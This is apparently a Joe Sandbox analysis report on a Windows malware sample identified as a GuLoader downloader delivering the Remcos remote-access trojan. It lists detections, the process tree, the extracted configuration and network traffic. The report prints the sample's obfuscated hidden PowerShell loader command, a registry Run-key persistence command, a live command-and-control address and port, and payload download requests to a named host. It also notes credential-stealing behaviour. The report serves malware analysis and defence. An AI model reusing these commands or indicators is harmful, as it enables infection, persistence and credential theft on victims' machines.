Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.12793.28433.exe

Overview

General Information

Sample name:SecuriteInfo.com.FileRepMalware.12793.28433.exe
Analysis ID:1528523
MD5:84e09bf944042fbd418724cddb729516
SHA1:8d908f01be478390e49bfe51fbca4959af157e1f
SHA256:2263f87e66243b4f0d6b1bb79e0638c6556b5d89a2506ad9db5c30cc02bbdcc3
Tags:exeGuLoader
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.FileRepMalware.12793.28433.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe" MD5: 84E09BF944042FBD418724CDDB729516)
    • powershell.exe (PID: 7536 cmdline: "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wabmig.exe (PID: 3200 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
        • cmd.exe (PID: 2596 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 2988 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • wabmig.exe (PID: 4780 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
        • wabmig.exe (PID: 4140 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
        • wabmig.exe (PID: 4124 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "107.173.4.16:2404:1", "Assigned name": "Rem_doc2", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-DSGECX", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000007.00000002.2408058471.000000000C4AF000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wabmig.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wabmig.exe, ParentProcessId: 3200, ParentProcessName: wabmig.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", ProcessId: 2596, ProcessName: cmd.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2988, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Markedsandel
            Sigma detected: Direct Autorun Keys Modification
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2596, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", ProcessId: 2988, ProcessName: reg.exe
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7536, TargetFilename: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe
            Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wabmig.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wabmig.exe, ParentProcessId: 3200, ParentProcessName: wabmig.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", ProcessId: 2596, ProcessName: cmd.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)", CommandLine: "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe, ParentProcessId: 7260, ParentProcessName: SecuriteInfo.com.FileRepMalware.12793.28433.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)", ProcessId: 7536, ProcessName: powershell.exe

            Stealing of Sensitive Information

            barindex
            Sigma detected: Remcos
            Source: Registry Key setAuthor: Joe Security: Data: Details: 00 21 BC BC 23 53 AF E8 95 9B EA 2A 1D D0 4A 56 FF 2F 8C 12 D6 DA 2F CC 6E 71 6C 68 29 B5 8F 45 A4 15 B1 3D F4 20 4F 66 2F 76 21 D1 DF 18 43 66 47 03 CD AD 5C C2 20 8D 8F 8B 13 7D 56 60 30 49 D5 1E F6 B2 23 6C D4 38 AE 4F 66 98 B9 7C A4 6C 1A CE FD 31 B1 4D 88 7C 4C F5 F3 3C C8 78 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wabmig.exe, ProcessId: 3200, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX\exepath

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T00:40:26.595153+020020365941Malware Command and Control Activity Detected192.168.2.1049982107.173.4.162404TCP
            2024-10-08T00:40:27.766991+020020365941Malware Command and Control Activity Detected192.168.2.1049984107.173.4.162404TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T00:40:27.786302+020028033043Unknown Traffic192.168.2.1049983178.237.33.5080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T00:40:23.505863+020028032702Potentially Bad Traffic192.168.2.1049980185.26.107.5780TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "107.173.4.16:2404:1", "Assigned name": "Rem_doc2", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-DSGECX", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exeReversingLabs: Detection: 47%
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exeReversingLabs: Detection: 47%
            Yara detected Remcos RAT
            Source: Yara matchFile source: 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 3200, type: MEMORYSTR
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 185.26.107.57:443 -> 192.168.2.10:49981 version: TLS 1.2
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: qm.Core.pdb1 source: powershell.exe, 00000007.00000002.2404247837.0000000007602000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tem.Core.pdb source: powershell.exe, 00000007.00000002.2404247837.0000000007602000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mation.pdb source: powershell.exe, 00000007.00000002.2399932487.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000007.00000002.2407709263.00000000087D7000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_0040595A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_00402862 FindFirstFileW,5_2_00402862
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_0040658F FindFirstFileW,FindClose,5_2_0040658F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_232310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_232310F1
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_23236580 FindFirstFileExA,12_2_23236580
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407EF8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407898
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\euthanasic\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Jump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49982 -> 107.173.4.16:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49984 -> 107.173.4.16:2404
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 107.173.4.16
            Source: global trafficTCP traffic: 192.168.2.10:49982 -> 107.173.4.16:2404
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 185.26.107.57 185.26.107.57
            Source: Joe Sandbox ViewIP Address: 185.26.107.57 185.26.107.57
            Source: Joe Sandbox ViewIP Address: 107.173.4.16 107.173.4.16
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49980 -> 185.26.107.57:80
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:49983 -> 178.237.33.50:80
            Source: global trafficHTTP traffic detected: GET /CubBVEODo227.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: cmgtrading.euConnection: Keep-AliveCookie: SERVID=A
            Source: global trafficHTTP traffic detected: GET /CubBVEODo227.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cmgtrading.euCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: global trafficHTTP traffic detected: GET /CubBVEODo227.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: cmgtrading.euConnection: Keep-AliveCookie: SERVID=A
            Source: global trafficHTTP traffic detected: GET /CubBVEODo227.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cmgtrading.euCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: wabmig.exe, 00000011.00000003.2456199398.0000000002F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: wabmig.exe, 00000011.00000003.2456199398.0000000002F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
